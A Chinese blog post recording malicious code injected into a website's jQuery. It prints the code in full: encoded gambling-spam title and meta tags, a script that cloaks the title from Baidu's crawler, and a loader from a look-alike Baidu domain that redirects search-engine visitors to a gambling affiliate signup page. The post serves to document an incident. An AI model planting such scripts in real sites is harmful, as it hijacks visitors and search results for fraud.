欢迎光临
感谢一路有你

记录一次网站jq恶意代码经历

如果你对该文章中的内容有疑问/不解,可以点击此处链接提问
要注明问题和此文章链接地址 点击此处跳转
 
//病恶意代码生成如下代码
<title>&#98;&#101;&#116;&#119;&#97;&#121;&#23448;&#32593;&#1****#119;&#97;&#121;&#24517;&#23041;&#20307;&#32946;&#124;&#98;&#101;&#116;&#119;&#97;&#121;&#24517;&#23041;&#20307;&#32946;&#23448;</title>
<meta name="keywords" content="&#98;&#101;&#116;&#119********&#23041;&#44;&#24517;&#23041;&#20307;&#32946;&#44;&#98;&#101;&#116;&#119;&#97;&#121;&#44;&#98;&#101;&#116;&#119;&#97;&#121;&#25163;&#26426;&#29256;&#44;&#24517;&#23041;&#25163;&#26426;&#29256;&#44;&#98;&#101;&#116;&#119;&#97;&#121;&#23448;&#32593;&#44;&#24517;&#23041;&#23448;" />
<meta name="description" content="&#98;&#101;&#1*******1;&#24517;&#23041;&#20307;&#32946;&#20122;&#24030;&#26368;&#20339;&#20307;&#32946;&#24179;&#21488;&#65292;&#25552;&#20379;&#20307;&#32946;&#12289;&#30495;&#20154;&#12289;&#30005;&#31454;&#12289;&#28216;&#25103;&#65292;&#32467;&#31639;&#24555;&#36820;&#27700;&#26368;&#39640;&#65292;&#33521;&#36229;&#29699;&#38431;&#35199;&#27721;&#22982;&#32852;&#30340;&#23448;&#26041;&#20027;&#35201;&#36190;&#21161;&#21830;" />

<script>if(navigator.userAgent.toLocaleLowerCase().indexOf("baidu") == -1){var title = document.getElementsByTagName('title')[1].text; document.title = title;}</script>
<script type="text/javascript" src="https://hmbaidu.com/hm.js?11ed6542762b11d68e263f6ad552b2e4"></script>

//https://hmbaidu.com/hm.js源文件
var _hmt = _hmt || [];
(function() {
	var a = document.createElement("script");
	a.src = "https://hm.baidu.com/hm.js?11ed6542762b11d68e263f6ad552b2e4";
	var b = document.getElementsByTagName("script")[0];
	b.parentNode.insertBefore(a, b)
})();
var refer = document.referrer;
refer = refer.toLowerCase();
var aSites = "google. baidu. soso. so. 360. yahoo. youdao. sogou. m.sm. gougou. bing.".split(" "),
	isEngine = !1;
for (i in aSites) if (0 < refer.indexOf(aSites[i])) {
	isEngine = !0;
	break
}
if(isEngine){
	var host = window.location.host;
	if(host.indexOf("mvuk****.com") > 0 && 0 < refer.indexOf("so.com")){
                    //跳转到恶意页面
		window.location.href = "https://www.***.com/members/registration.htm?aff=B108469&media=kiwz&web=0";
	}
	if(host.indexOf("zuand***sheng.com") > 0 || host.indexOf("0769web.net")  > 0 || host.indexOf("cqxi***ingwa.com") > 0  || host.indexOf("wuzhouzhiqiao.com")  > 0 || host.indexOf("mr-teaa.com")  > 0 || host.indexOf("storer.jp") > 0 || host.indexOf("ytdswkj.com") > 0  || host.indexOf("rutenbuy.com") > 0  || host.indexOf("enb-ee9e.net") > 0 || host.indexOf("fcplaza.com") > 0){
               //跳转到恶意页面
		window.location.href = "https://www.***.com/members/registration.htm?aff=B108469&media=kiwz&web=0";
	}
}

该病毒很简单,只是一个简单的js跳转

赞(0) 打赏
未经允许不得转载:王明昌博客 » 记录一次网站jq恶意代码经历
分享到: 更多 (0)

相关推荐

  • 暂无文章

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

微信扫一扫打赏

×
订阅图标按钮